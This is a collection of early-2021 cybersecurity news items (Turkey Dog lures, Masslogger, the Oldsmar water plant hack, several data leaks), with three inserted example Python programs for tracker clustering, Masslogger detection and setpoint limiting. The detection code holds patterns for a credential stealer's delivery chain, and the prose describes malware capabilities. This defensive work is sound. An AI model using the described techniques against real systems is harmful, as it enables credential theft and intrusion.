
Turkey Dog Activity Continues to use COVID Lures

 

A year into the pandemic, Turkey Dog-related activity is ongoing, with campaigns that keep using "free internet" lures. The current campaigns use lure pages that promise cash payments of thousands of Turkish Lira and purport to be linked to the Turkish government. For instance, according to Google Translate, one page states, "Final Phase Pandemic Support Application - 3,000TL State Support for All Applicants!" Another features a picture of Turkish Minister of Health Dr. Fahrettin Koca and promises 1,000 lira for "everybody applying!"

Some of the lure pages use whos.amung.us scripts for visitor tracking. RiskIQ's Internet Intelligence Graph uses the unique identifiers embedded in these scripts to link numerous Turkey Dog domains together. For example, a RiskIQ crawl of pandemidesteklerim[.]com observed a whos.amung.us ID loaded on the page; the same ID had been seen on 431 hosts since April 26, 2020. RiskIQ also found a Google Analytics tracking ID associated with 52 Turkey Dog domains since October 25, 2020.
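The pivot described above (grouping lure domains by the third-party tracker IDs their pages embed), as an added example that is not RiskIQ's code. The page HTML and domain names are constructed; the whos.amung.us snippet format (`_wau.push([...])`) is an assumption, while the `UA-…` Google Analytics ID format is the real Universal Analytics property ID shape.

```python
"""Cluster lure-page domains by the tracker IDs embedded in their HTML.

Added example (not RiskIQ's code). Sample pages and domains are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Universal Analytics property IDs look like UA-12345678-1.
GA_RE = re.compile(r"\bUA-\d{4,10}-\d{1,3}\b")
# whos.amung.us widget call, e.g. _wau.push(["small", "<id>", "left"]).
# The exact call shape is an assumption made for this example.
WAU_RE = re.compile(r'_wau\.push\(\[\s*"[a-z]+"\s*,\s*"([0-9a-z]+)"', re.I)


def extract_trackers(html: str) -> set[str]:
    """Return every tracker ID found on a page, prefixed by tracker type."""
    found = {f"ga:{m}" for m in GA_RE.findall(html)}
    found |= {f"wau:{m.lower()}" for m in WAU_RE.findall(html)}
    return found


def cluster_by_tracker(pages: dict[str, str]) -> dict[str, list[str]]:
    """Map each tracker ID to the sorted list of domains whose page carries it."""
    clusters: dict[str, set[str]] = defaultdict(set)
    for domain, html in pages.items():
        for tracker in extract_trackers(html):
            clusters[tracker].add(domain)
    return {t: sorted(d) for t, d in clusters.items()}


def shared_trackers(pages: dict[str, str], min_domains: int = 2) -> dict[str, list[str]]:
    """Keep only tracker IDs seen on at least `min_domains` domains.

    A tracker ID shared by several lure domains is the pivot point: once one
    domain is confirmed malicious, the others carrying the same ID deserve
    review, while an ID seen on a single domain proves nothing on its own.
    """
    return {t: d for t, d in cluster_by_tracker(pages).items() if len(d) >= min_domains}


# Constructed crawl results: three related lure pages and one unrelated site.
SAMPLE_PAGES = {
    "lure-a.example": """<html><body><h1>Pandemi destek basvurusu</h1>
      <script>var _wau=_wau||[];_wau.push(["small","k3x9abc","left"]);</script>
      <script>ga('create','UA-12345678-1','auto');ga('send','pageview');</script>
      </body></html>""",
    "lure-b.example": """<html><body>
      <script>var _wau=_wau||[];_wau.push(["small","k3x9abc","right"]);</script>
      </body></html>""",
    "lure-c.example": """<html><body>
      <script async src="https://www.googletagmanager.com/gtag/js?id=UA-12345678-1"></script>
      </body></html>""",
    "unrelated.example": """<html><body>
      <script>ga('create','UA-99999999-2','auto');</script>
      </body></html>""",
}

if __name__ == "__main__":
    for tracker, domains in shared_trackers(SAMPLE_PAGES).items():
        print(f"{tracker}: shared by {len(domains)} domains -> {', '.join(domains)}")
```

On the constructed sample, the whos.amung.us ID ties lure-a to lure-b and the Google Analytics ID ties lure-a to lure-c, so all three fall into one cluster while the unrelated site stays apart.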

In May 2020, threat researcher BushidoToken published a blog post pulling together multiple indicators, some dating back to April 2020, from researchers tracking Cerberus and Anubis activity targeting Turkish speakers. These two remote access Trojans (RATs), both sold under a malware-as-a-service model, steal user credentials to access bank accounts. Highly deceptive, they can overlay other applications (dynamic overlays), capture keystrokes, harvest and send SMS messages, forward calls, and access other sensitive information on the device.

Because RiskIQ regularly crawls malicious app distribution URLs drawn from various internal and external feeds, it can directly observe the lure pages used by malicious Android applications. The mobile application landscape is likely awash with Turkey Dog mobile applications. A quick search for blacklisted samples of one known Turkey Dog APK, "edestek.apk", yields 90 results from as many unique Turkey Dog URLs. All 90 of these samples can read, receive, and send SMS messages, allowing them to bypass SMS-based two-factor authentication. Many of them can also record audio, perform full-screen overlays to present a fake login page for harvesting banking credentials, and download additional software packages.

A year on, cybercriminals continue to use the COVID-19 pandemic as a lure for victims. Turkey Dog activity has gone on unabated for a long time, likely securing a large pool of victims and separating them from their banking login credentials and other sensitive information.

Private Information of 50,000 French Healthcare Workers Stolen

 


French authorities discovered a large cache of stolen credentials on the dark web, apparently belonging to healthcare workers. The authorities have alerted the healthcare sector and advised it to remain vigilant. In recent weeks, threat actors have attacked several French hospitals – including hospitals in Dax and Villefranche-sur-Saone.

The French Ministry of Social Affairs and Health issued an alert this week stating that France's Computer Emergency Response Team had notified the ministry of the sale, on a cybercriminal platform, of a list of 50,000 user accounts containing login/password credentials apparently belonging to French healthcare workers.

The alert notes that “it is difficult to accurately describe the origin of this leak, but the impact that the use of login/agent password couples can have on the security of institutions’ information systems is more easily valuable. That includes attempts to connect to remote means of access, such as Outlook web access and VPN. Once the connection is successful, attackers can use all the resources allocated to the compromised account to break into the information system.”

The French health ministry also acknowledged that several healthcare facilities in the country have been attacked with malware including Emotet, TrickBot, and Ryuk, adding that “particular attention should be paid to this because these three malwares are used in complex chains of attacks that have a strong impact on the activity of victims. Scan campaigns from the infrastructure of the TA505 (Clop ransomware activity cluster) and UNC1878 (Ryuk ransomware activity cluster) targeting health facilities were also reported.”

Mutuelle Nationale des Hospitaliers (MNH), the latest victim of a ransomware attack, stated, “we spotted an intrusion into our data system on February 5 and our cybersecurity team quickly determined the potency of the cyber-attack. The computer systems were taken offline to negate the spread of the virus and to shield the personal information of our members, staff, and our partners.”

Threat actors are using the same tactics against the healthcare sector in France and in other countries as well. For instance, last week in South Korea, threat actors attempted to steal Covid-19 vaccine and treatment data from pharmaceutical maker Pfizer.

A Crypto Mining Botnet is Abusing Bitcoin Blockchains

 

Security researchers at Akamai have detected another botnet used for illicit cryptocurrency mining that abuses Bitcoin (BTC) transactions to stay under the radar. The technique lets the botnet operators make their infrastructure resilient to takedowns led by law enforcement.

“A recent piece of malware from a known crypto mining botnet campaign has started leveraging Bitcoin blockchain transactions in order to hide its backup C2 IP address. It’s a simple, yet effective, way to defeat takedown attempts,” reads the post published by Akamai. “Recent infection attempts against Akamai SIRT’s custom honeypots uncovered an interesting means of obfuscating command and control (C2) infrastructure information. The operators of a long-running crypto-mining botnet campaign began creatively disguising their backup C2 IP address on the Bitcoin blockchain.”

The infection chain starts with the exploitation of Remote Code Execution (RCE) vulnerabilities in Hadoop YARN, Elasticsearch (CVE-2015-1427), and ThinkPHP (CVE-2019-9082). The botnet operators also used Redis server scanners to find installations that could be compromised to mine cryptocurrency. The researchers estimate that the operators have mined more than $30,000 in Monero in public pools since 2018, and they have identified several variants over time, using different techniques and tools.

The older variants used a shell script to carry out the main functions, such as disabling security features, killing off competing infections, establishing persistence, and in some cases propagating within the compromised network. Newer variants of the shell script use binary payloads for more of the system interaction: killing off competitors, disabling security features, modifying SSH keys, and downloading and starting the miners. The operators use cron jobs and rootkits to maintain persistence and to re-infect hosts with the latest version of the malware.

In December 2020, the researchers found a BTC wallet address included in new variants of the miner, along with a URL for a wallet-checking API and bash one-liners. They found that the wallet information returned by the API was used to compute an IP address that serves to maintain persistence. By fetching addresses through the wallet API, the operators can obfuscate configuration data and back it up on the blockchain. The researchers noted that by pushing a small amount of BTC into the wallet, the operators can recover infected systems that have been orphaned.

Malwarebytes Report Confirms the Change in Tactics of Cybercriminals During Covid-19

 

Malwarebytes, an American security firm, announced the findings of its annual ‘State of Malware’ report, which examined how the working methods of both employees and cybercriminals changed. Working from home became the new normal during the Covid-19 pandemic, as many companies shifted to remote work.

The notable change was in the working methods of threat actors, who became more focused on gathering intelligence and on exploiting and preying upon fears with targeted and sophisticated attacks. Last year, threat actors went after many high-profile firms and well-known personalities: the accounts of Barack Obama, Jeff Bezos, and Elon Musk were hijacked; FireEye and SolarWinds were attacked through the software supply chain; and the Marriott hotel chain recorded the theft of records of 5.2 million guests.

Marcin Kleczynski, CEO of Malwarebytes stated, “this past year has taught us that cybercriminals are increasingly formidable, planning long-term, strategic, and focused attacks that are sometimes years in the making. 2020 continued to show us that no company is immune, and there is no such thing as ‘safe enough’.”

“The COVID-19 pandemic compounded this with new challenges in securing remote workforces, making it essential that we quickly become more adaptable and learn how to better protect workers in any environment. While our total detections are down this year, we must remain vigilant. The threats we are seeing are more refined and damaging than ever before”, he further added.

Last year, Malwarebytes observed an overall drop of 24 percent in Windows detections across businesses and an 11 percent drop for consumers. In total, there was a 12 percent drop in Windows detections across the board. However, Mac detections for businesses surged 31 percent, and 2020 also saw the growth of the Android malware FakeAdsBlock, which produced an alarming number of non-stop ads and accounted for 80,654 detections.

HiddenAds was found to be the most common mobile adware family; this trojan bombards users with ads, and nearly 704,418 detections were reported, an increase of nearly 150 percent year-over-year.

Chinese Hackers Cloned Exploit Tool Belonging to NSA

 

A Chinese hacking group allegedly "cloned" and deployed a zero-day exploit created by the U.S. National Security Agency's Equation Group before Microsoft fixed the Windows vulnerability being abused in 2017, according to an analysis published on Monday by Check Point Research. For several years, researchers had suspected that the Chinese hacking group known as APT31 or Zirconium had developed an exploit tool for a vulnerability tracked as CVE-2017-0005 and found in older versions of Windows, such as Windows 7 and Windows 8, according to the report.

The report raises further questions about how some of the NSA's most valued cyberweapons have been discovered or stolen by nation-state hacking groups and then turned against their developers over the years. In May 2019, Symantec published a similar report finding that another group of hackers had taken and exploited cyber tools developed by the NSA. Both the Symantec and the Check Point research indicate that the theft of NSA Equation Group tools by these groups appears to have occurred before the hacking group known as the Shadow Brokers first began publishing the agency's exploits in 2016.

Security researchers previously noted that a zero-day exploit for CVE-2017-0005, called "Jian," was created in 2014 and first deployed in 2015. The exploit was in use for a long time before Microsoft finally issued a patch for it in 2017. When exploited, the bug could allow an attacker to escalate privileges on a compromised device and then gain full control, the researchers note. Microsoft published its fix for CVE-2017-0005 in March 2017, when the company was forced to issue multiple fixes for the exploits related to the Shadow Brokers "Lost in Translation" leak, Check Point notes.

Further investigation by Check Point found that Jian was not an original creation but a clone of a zero-day exploit for older versions of Windows created by the NSA Equation Group in 2013 and originally called "EpMe" by the agency, according to the new report.

In another case documented by Symantec in 2019, APT3 "Buckeye" was linked to attacks using Equation Group tools in 2016, before the Shadow Brokers leak.

Sequoia Capital Told Investors it was Hacked

 

Sequoia Capital told its investors on Friday that some personal and financial data may have been accessed by a third party after one of its employees fell for a successful phishing attack, according to a report by Axios. Sequoia Capital is one of Silicon Valley's oldest and most successful venture capital firms, with more than $38 billion in assets under management, according to Pitchbook data. The 49-year-old venture capital firm has invested in companies like Airbnb, DoorDash, and 23andMe. It has also invested in cybersecurity companies like FireEye and Carbon Black, according to its website.

Sequoia was founded by Don Valentine in 1972 in Menlo Park, California. In the 1990s, Valentine handed control of the firm to Doug Leone and Michael Moritz. In 1999, Sequoia extended its operations to Israel. Sequoia Capital China was set up in 2005 as an offshoot of the U.S. firm and is led by Neil Shen. In 2006, Sequoia Capital acquired Westbridge Capital Partners, an Indian venture capital firm, which was later renamed Sequoia Capital India. CB Insights ranked Sequoia Capital as the top venture capital firm in 2013. The U.S. firm had 11 partners as of 2016.

Sequoia told investors that it has not yet seen any sign that compromised data is being traded or otherwise misused on the dark web, Axios reported. A Sequoia representative confirmed on Saturday that the firm had "recently experienced a cybersecurity incident" that its security team was investigating. It had also notified law enforcement and was working with outside cybersecurity experts, the firm said.

A Sequoia spokesperson said, "We recently experienced a cybersecurity incident. Our security team responded promptly to investigate, and we contacted law enforcement and engaged leading outside cybersecurity experts to help remediate the issue and maintain the ongoing security of our systems." He also said, "We regret that this incident has occurred and have notified affected individuals. We have made considerable investments in security and will continue to do so as we work to address constantly evolving cyber threats."

It does not appear that the hack was connected to the SolarWinds attacks, which included a larger breach of FireEye and have affected government agencies and large technology companies such as Microsoft.

CLoP Hacker Group Purloined Data From Jones Day

 

A dispute has broken out over the provenance of stolen information between US law firm Jones Day and the CLoP ransomware group after some of the firm's assets were leaked on the dark web. The CLoP group has posted a large tranche of stolen files to a dark web “leak site,” claiming it took them from the law firm during a recent cyberattack. Such sites are routinely used by ransomware groups to pressure a victim into paying. CLoP's site is publicly accessible and its existence has been verified.

In correspondence with the Wall Street Journal, the CLoP gang claimed to have obtained more than 100GB of material directly from Jones Day's servers and said it first contacted the firm with ransom demands on 3 February 2021. Jones Day has not engaged with the gang, hence the leak. However, the WSJ went on to report that Jones Day – which is among several law firms scrutinized for its connections to former president Trump – has denied that its network was breached and insists that the information was stolen in a supply chain attack on Accellion’s legacy file transfer product, FTA, which was publicly disclosed in January 2021.

Accellion was first informed of a zero-day vulnerability in its FTA product – which is rapidly approaching end-of-life – in December 2020. It released a patch within 72 hours, but the initial incident turned out to be only the first of a series of exploits used to attack its service over the following weeks. “Our latest release of FTA has addressed all known vulnerabilities at this time,” said Accellion CISO Frank Balonis. “Future exploits, however, are a constant threat. We have encouraged all FTA customers to migrate to kiteworks for the last three years and have accelerated our FTA end-of-life plans in light of these attacks.”

Emsisoft's Brett Callow said: “If CLoP published Jones Day’s data and Jones Day says the data leaked a result of the attack on Accellion, the logical conclusion would be that CLoP was responsible for that attack – and that means they may have data relating to other Accellion customers.”

“LinkedIn Private Shared Document” Shared Via Phishing Email by Hackers

 

LinkedIn appears to have become a popular venue for phishing, and users have been targeted with phishing messages in a recent scam on the site. As the public has become more familiar with the standard tactics used against them, cybercriminals have had to adopt new ones to avoid detection.

JB Bowers, a security researcher, found that attackers are using LinkedIn to trick users into giving up their login credentials. The scheme tries to get unsuspecting users to open a "LinkedIn Private Shared Document," after which they are asked for their login credentials on a fake LinkedIn page. The message prompts the recipient to follow a link from a third party to access the document.

Any user who receives an unsolicited message from an unknown contact through LinkedIn's internal messaging system should be extremely careful, particularly if asked to enter login details. Users who mistakenly enter their credentials may then have phishing messages sent from their own account, which their LinkedIn contacts can also see.

As to why attackers target LinkedIn users, it may be because regular LinkedIn users have higher incomes than average and are perceived as higher-value targets. Or, since LinkedIn is tied to other Microsoft services such as Office 365, a hijacked LinkedIn account could lead to further identity compromise. As the name suggests, phishing tries to lure users into handing over confidential details. This could take the form of emails offering a free smartphone, or something more formal, as in the case above. Colleges and businesses are further targets of phishing attacks. Attackers are now more sophisticated and will send a bogus email that appears to come from your employer, since LinkedIn tells them who you work with. The phishing pages are hosted on platforms that also serve legitimate business purposes, such as Firebase and Pantheon.io, which makes it impractical for companies to simply block them.

“The sites use major ASNs including Fastly, Google, and Microsoft, making basic network traffic analysis for the end-user also not so useful,” Bowers stated.

Employees must be trained to recognize this form of intrusion, which can lead to a broader breach of enterprise processes and networks. Another option is to block the use of social media/networks on work devices, but that may not suit workers. Victims need to be made aware of the deception and must also let their LinkedIn contacts know about it. In some instances, some of those contacts will have been fooled as well and will have to go through the same process.

“If you see any more LinkedIn messages like this […] you’ll want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn,” Bowers advised.

Masslogger Campaign Exfiltrates Users' Credentials

 

Attackers are constantly reinventing ways to monetize their tools. Cisco Talos recently discovered an interesting campaign affecting Windows systems and targeting users in Turkey, Latvia, and Italy, although similar campaigns by the same actor also targeted users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October and November 2020. The threat actor uses a multi-modular approach that begins with the initial phishing email and carries through to the final payload. The adversaries behind this campaign likely do this to evade detection. However, it can also be a weakness, as it gives defenders many opportunities to break the kill chain.

Delivered through phishing emails, the latest variant of the Masslogger trojan is contained inside a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla's security research arm. Cisco Talos added: “Masslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP protocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is done through the Masslogger control panel web application.”

CHM is a compiled HTML file format; here the file contains an embedded HTML page with JavaScript code that starts the active infection process. Each stage of the infection is obfuscated to avoid detection by simple signatures. The next stage is a PowerShell script that eventually deobfuscates into a downloader, which downloads and loads the main PowerShell loader. The Masslogger loaders appear to be hosted on compromised legitimate hosts with a filename consisting of one letter and one number followed by the .jpg extension, for instance "D9.jpg".

Masslogger is not an entirely new creation of the malware industry: Talos highlighted research by infosec researcher Fred HK, who attributed it to a malware underground persona going by the handle NYANxCAT. Prices for Masslogger were reportedly $30 for three months or $50 for a lifetime license. Cisco's analysis showed that Masslogger “is almost entirely executed and present only in memory”, with only the email attachment and the HTML help file stored on disk.
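Detection logic for the delivery chain described in the three paragraphs above (RAR volume or CHM attachment, CHM viewer spawning PowerShell, loader fetched as a one-letter-one-digit .jpg), run over constructed telemetry. This is an added example, not Cisco Talos' code; the event field names are assumed for a generic telemetry feed, and hh.exe is the Windows HTML Help viewer that opens .chm files.

```python
"""Correlate the Masslogger delivery stages across mail, process and proxy events.

Added example, not Cisco Talos' code. Event records are constructed and the
field names (type, host, attachment, parent_image, image, url) are assumed.
"""
import re

# Loader naming pattern from the article: one letter, one digit, ".jpg".
# On its own this is low fidelity (short image names are common), so it is
# only raised to a verdict when the other stages fire on the same host.
LOADER_URL_RE = re.compile(r"/[A-Za-z][0-9]\.jpg(?:\?.*)?$")
# Multi-volume RAR parts (.r00, .r01, ...) and compiled HTML Help attachments.
SUSPECT_ATTACHMENT_RE = re.compile(r"\.(?:r\d{2}|chm)$", re.I)

STAGES = {"rar_volume_or_chm_attachment", "chm_to_powershell", "loader_jpg_url"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def chm_spawns_powershell(event: dict) -> bool:
    """True when the CHM viewer (hh.exe) launches PowerShell: stage 1 -> stage 2."""
    parent = _basename(event.get("parent_image", ""))
    child = _basename(event.get("image", ""))
    return parent == "hh.exe" and child in {"powershell.exe", "pwsh.exe"}


def is_loader_url(url: str) -> bool:
    return bool(LOADER_URL_RE.search(url))


def is_suspect_attachment(name: str) -> bool:
    return bool(SUSPECT_ATTACHMENT_RE.search(name))


def triage(events: list) -> list:
    """Return (stage, host, detail) tuples for every event matching a stage."""
    alerts = []
    for e in events:
        if e["type"] == "mail" and is_suspect_attachment(e["attachment"]):
            alerts.append(("rar_volume_or_chm_attachment", e["host"], e["attachment"]))
        elif e["type"] == "process" and chm_spawns_powershell(e):
            alerts.append(("chm_to_powershell", e["host"], e["image"]))
        elif e["type"] == "proxy" and is_loader_url(e["url"]):
            alerts.append(("loader_jpg_url", e["host"], e["url"]))
    return alerts


def hosts_with_full_chain(events: list) -> set:
    """Hosts on which all three stages were observed; the high-confidence verdict."""
    seen: dict = {}
    for stage, host, _ in triage(events):
        seen.setdefault(host, set()).add(stage)
    return {h for h, stages in seen.items() if STAGES <= stages}


# Constructed telemetry: ws01 shows the whole chain, ws02 only benign activity.
SAMPLE_EVENTS = [
    {"type": "mail", "host": "ws01", "attachment": "invoice_2020-11.r00"},
    {"type": "mail", "host": "ws02", "attachment": "report.pdf"},
    {"type": "process", "host": "ws01",
     "parent_image": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "proxy", "host": "ws01", "url": "http://compromised-site.example/images/D9.jpg"},
    {"type": "proxy", "host": "ws02", "url": "http://cdn.example/photos/holiday.jpg"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print("stage hit:", alert)
    print("full chain on:", sorted(hosts_with_full_chain(SAMPLE_EVENTS)))
```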

Ukrainian police arrested members of a well-known cyber ransomware group

Members of the Egregor group, which offers its ransomware under the Ransomware-as-a-Service (RaaS) model, have been arrested by the Ukrainian police.

The arrest is the result of a joint operation of the French and Ukrainian law enforcement systems. The names of the arrested citizens were not disclosed, but it is known that they provided logistical and financial support for the service.

It is worth noting that this ransomware has been active since the fall of 2020 and operates under the Ransomware-as-a-Service (RaaS) model. That is, the authors of the malware rent it out to other criminals, who do the actual hacking of companies, stealing data, encrypting files, and then demanding a “double ransom” from victims (for decrypting the files, and for not disclosing the data stolen during the intrusion).

If the victims pay a ransom, the group that organized the hack keeps most of the funds, and the developers of Egregor receive only a small share. The attackers laundered funds through the Bitcoin cryptocurrency.

Those arrested are suspected, among other things, of providing such financial schemes.

According to Allan Liska, a cybersecurity researcher at Recorded Future, Recorded Future has discovered that the Egregor infrastructure, including the site and the management and control infrastructure, has been offline since at least Friday (February 12).

The French side joined the investigation after the Egregor software was used in attacks on the computer game developer Ubisoft and the logistics organization Gefco in 2020.

Although the Egregor system based on the RaaS model was launched in September 2020, a number of cybersecurity experts believe that the service operators are the well-known cyber ransomware group Maze.

Lithuanian Police Investigate Leak of 110,000 User Records of CityBee

 

Police in Lithuania are investigating after the personal information of 110,000 individuals was leaked on a hacker forum. The car-sharing service CityBee confirmed that the records of thousands of its customers had been compromised in the incident. The first part of the database was posted on February 15 and includes 110,000 CityBee user IDs, usernames, hashed passwords, full names, and personal codes (national identification numbers) belonging mostly to Lithuanian CityBee users. The second part, posted on February 16 by the same threat actor, appears to contain more detailed personal data, possibly including driver's license numbers and CityBee credit limits, as well as a folder named “CreditCards.”

While the author of the post initially claimed that the data had been stolen from CityBee at some point in 2020, it was later confirmed that the database was exfiltrated from an unsecured Microsoft Azure blob managed by CityBee and dating from at least February 2018. Apparently, Rapid7's Open Data Forward DNS dataset was used to search reverse DNS records, which is how the threat actor found the unsecured CityBee blob. A directory brute-force attack was then used to enumerate directories in the blob, after which the threat actor downloaded the files.

“The data, which was uploaded to one of the cyber hackers favourite forums, is three years old,” CityBee said in a statement. A poster on the hacker forum said the list was extracted from data grabbed in February 2018 from an unsecured database backup, and offered the full data set for $1,000 paid in Bitcoin. Disclosure of the stolen customer information will not affect the security of CityBee customers' financial services, as the company does not collect sensitive data related to customer payment methods.

“We are very sorry. I am one of the victims of the leak because I use the service, and I very well understand that feeling of insecurity,” CityBee CEO Kristijonas Kaikaris told journalists on Tuesday. He advised the affected customers to “don’t panic” and to change their passwords. The company risks a fine of up to 20 million euros ($24.21 million), or 4% of its turnover, if found in breach of regulations.

US court sentenced Ukrainian to seven years in prison for electronic fraud

A court in the United States has sentenced Ukrainian citizen Alexander Musienko to more than seven years in prison for participating in an online money-laundering scheme that legalized millions of dollars.

The suspect pleaded guilty to electronic fraud. On February 11, the court sentenced him to 87 months in prison (more than seven years). In addition, the Ukrainian citizen is required to pay more than $98.7 thousand in restitution.

As follows from the materials of the case, from 2009 to 2012, the 38-year-old Alexander Musienko from Odessa collaborated with computer hackers from Eastern Europe in order to get more than $3 million from the bank accounts of American companies. These funds were eventually stolen and legalized using bank accounts abroad.

According to the U.S. Department of Justice, he legalized funds stolen by hackers in the United States. This task was entrusted to private individuals whom Musienko hired by fraud to perform the duties of financial assistants. They transferred the stolen funds to their bank accounts at the agreed time and immediately transferred them to third-party accounts registered outside the United States.

For example, in September 2011, Musienko's financial assistants, who believed they were working for a legitimate business, hacked the online accounts of a North Carolina company and transferred a total of almost $296.3 thousand to two bank accounts controlled by Musienko.

The Department added that Musienko was arrested in South Korea in 2018 and extradited to the United States in 2019. Around April 2019, the FBI investigated the information on Musienko's laptop. As a result, files containing about 120 thousand payment card numbers and associated identification information were found.

Ukraine’s PrivatBank Database for Sale on a Hacking Forum

 

PrivatBank is the largest commercial bank in Ukraine by number of customers, asset value, loan portfolio, and taxes paid to the national budget. Headquartered in Dnipro, in central Ukraine, the bank was nationalized by the government of Ukraine on 18 December 2016 to protect its 20 million clients and to preserve "financial stability in the country".

According to its website, PrivatBank's net profit for 2020 was 25.3 billion UAH, which is around $910 million. The database is said to contain 40 million customer records with fields such as full name, date of birth, taxpayer identification number, place of birth, passport details, and family status.

Ukraine has a population of 44 million, so the database’s 40 million records would cover 93% of the population. However, it isn't clear whether these are unique records, and it would be unlikely that PrivatBank holds records on 93% of Ukraine's population, given the age groups that wouldn't have bank accounts.

The threat actor is asking $3,400 in bitcoin for the release of the database. When CyberNews looked at the bitcoin address provided, it appeared that nobody had yet purchased the database through that particular wallet. However, it is also possible that the threat actor generates a new wallet for each sale, a process that can be automated.

In 2016, hackers allegedly stole $10 million from the bank through a loophole in the SWIFT international banking system. Before that, in 2014, the pro-Russian hacker group CyberBerkut claimed credit for hacking into the bank and harvesting customer information, which it then published on the Russian social media platform VKontakte. This was apparent retaliation for a PrivatBank partner who had offered a $10,000 bounty for the capture of Russian-backed militants in Ukraine. Earlier in 2014, another group named Green Dragon claimed credit for a DDoS attack on PrivatBank and claimed it had accessed customer information during the attack.

A 2018 report by a US corporate investigations company stated that “PrivatBank was subjected to a large scale and coordinated fraud over at least a ten-year period ending December 2016, which resulted in the Bank suffering a loss of at least USD 5.5 billion.”

Hacker Attacked a Water Plant in Florida

 

A hacker penetrated the computer network of the water treatment plant in Oldsmar, Florida, remotely ordering a 100-fold increase in a chemical that is highly dangerous in concentrated amounts. In an attack with the potential to harm public health, the hacker on February 5 accessed a city computer and changed the level of sodium hydroxide, which is used to remove metals and control acidity, from 100 parts per million to 11,100 parts per million, according to Bob Gualtieri, sheriff of Pinellas County.

This is a “significant and potentially dangerous increase,” Gualtieri said at a Monday press conference. The attacker momentarily entered the computer system at 8 a.m. on Feb. 5, before leaving and returning at about 1:30 p.m. for roughly three to five minutes, Gualtieri said. In that window, the operator of the water plant could see the attacker on screen, “with the mouse being moved about to open various software functions that control the water being treated in the system,” Gualtieri said. 

When the hacker left the system, the operator whose computer had been remotely taken over promptly reduced the level of the chemical, also known as lye. This prevented any harm to the public or the drinking water, Gualtieri said. He said there were additional safeguards in the water system that would have kept contaminated water from reaching the public. It isn't yet known whether the breach originated inside the U.S. or abroad, Gualtieri said. Oldsmar, with a population of almost 15,000, is located about 15 miles northwest of Tampa.

“Many of the victims appear to have been selected arbitrarily, such as small critical infrastructure asset owners and operators who serve a limited population set,” said Daniel Kapellmann Zafra, manager of analysis at Mandiant Threat Intelligence. Through “remote interaction with these systems,” the hackers have engaged in “limited-impact operations.” None of those examples brought about any damage to individuals or infrastructure, Zafra said. “We believe that the increasing interest of low sophisticated actors in industrial control systems is the result of the increased availability of tools and resources that allow malicious actors to learn about interactions with these systems,” he added.
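The Oldsmar account is a reminder that the last line of defense in a plant is not the HMI session but the limits the control layer enforces on what any session may command. The following is an added example written for this post, not code from the Oldsmar plant, its SCADA vendor or the investigators: a small guard that sits between an HMI (local or remote) and a dosing setpoint, refuses writes outside an engineering range or larger than a maximum step, and keeps an audit trail with the source of every request. The tag name, limits and the replayed requests are assumptions made for the illustration.

```python
"""Added example, not code from the Oldsmar plant, its SCADA vendor or the
investigators: a guard between an HMI (local or a remote session) and a
dosing setpoint that enforces an engineering range and a maximum change
per write, and records the source of every request.
Tag name, limits and the sample requests are assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class SetpointLimits:
    tag: str
    low: float        # lowest value the process may ever be commanded to
    high: float       # highest value the process may ever be commanded to
    max_step: float   # largest change a single write may make


@dataclass
class ChangeRecord:
    tag: str
    source: str                # who issued the write, e.g. "local-hmi" or "remote-session"
    requested: float
    applied: Optional[float]   # None when the write was refused
    reason: str


class SetpointGuard:
    """Out-of-band writes are refused outright rather than clamped, so the
    operator sees an alarm instead of a silently adjusted value."""

    def __init__(self, limits: SetpointLimits, initial: float):
        if not limits.low <= initial <= limits.high:
            raise ValueError("initial value outside engineering range")
        self.limits = limits
        self.value = initial
        self.audit: List[ChangeRecord] = []

    def request(self, new_value: float, source: str) -> ChangeRecord:
        lim = self.limits
        if not lim.low <= new_value <= lim.high:
            rec = ChangeRecord(lim.tag, source, new_value, None,
                               f"refused: outside range {lim.low}-{lim.high}")
        elif abs(new_value - self.value) > lim.max_step:
            rec = ChangeRecord(lim.tag, source, new_value, None,
                               f"refused: step exceeds {lim.max_step} per write")
        else:
            self.value = new_value
            rec = ChangeRecord(lim.tag, source, new_value, new_value, "applied")
        self.audit.append(rec)
        return rec

    def alarms(self) -> List[ChangeRecord]:
        """Every refused write is an alarm condition for the operator."""
        return [r for r in self.audit if r.applied is None]


def demo() -> SetpointGuard:
    """Replay a sequence like the one described: a remote session tries to
    push 100 -> 11,100 ppm; the guard keeps the process at a sane value."""
    guard = SetpointGuard(SetpointLimits("NaOH_dose_ppm", 50.0, 150.0, 20.0), 100.0)
    guard.request(11100.0, "remote-session")   # refused: outside range
    guard.request(110.0, "local-hmi")          # applied
    guard.request(140.0, "local-hmi")          # refused: step of 30 exceeds 20
    return guard


if __name__ == "__main__":
    g = demo()
    for rec in g.audit:
        print(f"{rec.source:15} {rec.requested:>8} -> {rec.applied} ({rec.reason})")
    print("process value:", g.value)
```

The point of refusing rather than clamping is that a clamped write from a remote session would look like a normal adjustment in the trend; a refusal lands in the audit log with its source and can be wired to an alarm, which is what a plant would want to see when someone it does not recognize is moving the mouse.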

Developer of Cyberpunk 2077 Hit by Ransomware Attack


Ransomware became an increasingly serious threat throughout 2020, as attackers continued to target hospitals and health care providers during the pandemic. A smaller pattern has also been building over the last few months: a string of attacks on video game companies, including big names like Ubisoft, Capcom, and Crytek. Now the developer CD Projekt Red, which released the much-criticized blockbuster Cyberpunk 2077 in December, is the latest target.

